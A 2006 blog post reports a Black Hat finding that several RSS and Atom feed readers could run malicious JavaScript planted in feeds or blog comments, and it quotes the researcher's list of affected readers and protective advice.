Friday, August 4, 2006

Blog RSS feeds pose risk to subscribers

And yes! You guessed it, even more cheerful news springing forth from this weeks Black Hat Conference in Las Vegas.

Turns out that several software applications that collate the popular RSS and Atom formats can pass malicious JavaScript, in some cases bypassing the local systems security settings. This allows the script to run with unfettered access to your machine. Attackers can even inject their attack code into the comments of trusted blogs!

"Attackers could exploit the problem by setting up a malicious blog and enticing a user to subscribe to the RSS feed. More likely, however, they would add malicious JavaScript to the comments on a trusted blog, Auger said. "A lot of blogs will take user comments and stick them into their own RSS feeds," he said."

( . . . snip . . . )

"A large percentage of the readers I tested had some kind of an issue," he said. In his presentation, Auger listed Bloglines, RSS Reader, RSS Owl, Feed Demon, and Sharp Reader as vulnerable. As protection, people could switch to a nonvulnerable reader. Also, feed publishers could ensure that their feeds don't include malicious JavaScript or any script at all, Auger said. Some services, however, rely on JavaScript to deliver ads in feeds, he noted. "

No comments:

Post a Comment

Comments are welcome but moderated to prevent spam links. I usually check them at least once a day in the evenings - so please be patient with me if your comment does not appear quickly.

Thank you.